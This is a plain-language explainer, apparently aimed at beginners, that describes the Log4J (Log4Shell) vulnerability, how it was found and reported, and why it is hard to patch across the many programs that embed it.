For almost entire December, the information security world has been talking about a vulnerability called Log4J.
What is Log4J?
Log4J is an open source program that does logging. It is core to many, many computer programs around the world. Apache is one of the most respected open source communities in the world. Log4J is distributed by Apache.
So, what is the problem?
On November 25th, Alibaba‘s security team found a vulnerability in this utility (a program that is done to perform some task) and reported it to the Apache Open Source community.
The vulnerability could let a hacker get remote control of any device. This means that if a hacker got to know about this problem with the program, they could write their own code (computer program) and get control of a device or server remotely (remotely: using the internet, without needing to go there).
Log4J is a utility that is written in Java. It was first released on January 8, 2001 – almost 21 years ago. This means that thousands of programs across the world, in various industries, have this vulnerability now.
The vulnerability is called Log4shell.
Cyber security experts around the world are taking this threat very seriously.
Why don’t we just remove or patch the vulnerability, like we usually do?
In the fence example that we read earlier to understand the concept of vulnerability, Hemant could either build a new fence altogether (remove), or he could strengthen the fence by putting additional horizontal bars where needed. This is called patching.
In case of Log4j, we cannot do that easily because a utility like this is embedded in thousands of programs and it is hard to even find it.
Companies have created scanning programs which scan all the applications and programs on the network and check whether log4j is being used by the program. But these scanners are not always accurate. In the meantime, the data and the network remains at risk.
The other issue is that because it is open source and because the applications are so many, each application may have used the same software in a different way or with a small modification. This means that we have to effectively understand the use and write patches to protect all the places where this utility has been used.
So, what happens now?
At this time, its a race between the hackers and the security companies. Both are working hard. The hackers are trying to use the vulnerability to attack systems, possibly bring the networks to a standstill, or just steal data.
The security firms are working to protect as many devices as they can, and monitoring threats much more stringently.
Many software programmers of the Apache Foundation have been working almost non stop since the vulnerability was reported.